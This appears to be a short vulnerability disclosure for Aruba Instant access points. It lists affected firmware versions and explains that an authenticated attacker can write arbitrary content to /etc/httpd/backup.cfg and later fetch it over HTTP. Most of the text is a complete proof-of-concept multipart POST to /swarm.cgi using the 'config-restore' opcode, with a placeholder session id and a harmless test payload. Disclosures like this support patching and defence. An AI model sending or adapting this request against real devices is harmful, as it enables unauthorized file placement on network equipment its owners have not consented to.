- Aruba Instant
- Aruba Instant 6.4.x: 6.4.4.8-4.2.4.17 and below - Aruba Instant 6.5.x: 6.5.4.18 and below - Aruba Instant 8.3.x: 8.3.0.14 and below - Aruba Instant 8.5.x: 8.5.0.11 and below - Aruba Instant 8.6.x: 8.6.0.7 and below - Aruba Instant 8.7.x: 8.7.1.1 and below
An authenticated attacker can upload arbitrary content to /etc/httpd/backup.cfg, which can be later used as an endpoint to fetch files from.
After placing the arbitrary content an attacker can request it via http://IP:PORT/backup.cfg
POST /swarm.cgi HTTP/1.1
Host: IP:4343
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------267552147179520545798345899
Content-Length: 635
Origin: http://IP:4343
Connection: keep-alive
Referer: http:// IP:4343/
Upgrade-Insecure-Requests: 1
-----------------------------267552147179520545798345899
Content-Disposition: form-data; name="upload_id"
C0CCFB1C-2BAF-4CFE-85DF-A03A6FB65342
-----------------------------267552147179520545798345899
Content-Disposition: form-data; name="sid"
XXXXXXXXXXXXXXXXXXXX
-----------------------------267552147179520545798345899
Content-Disposition: form-data; name="opcode"
config-restore
-----------------------------267552147179520545798345899
Content-Disposition: form-data; name="config"; filename="file"
Content-Type: application/octet-stream
testtesttest
-----------------------------267552147179520545798345899--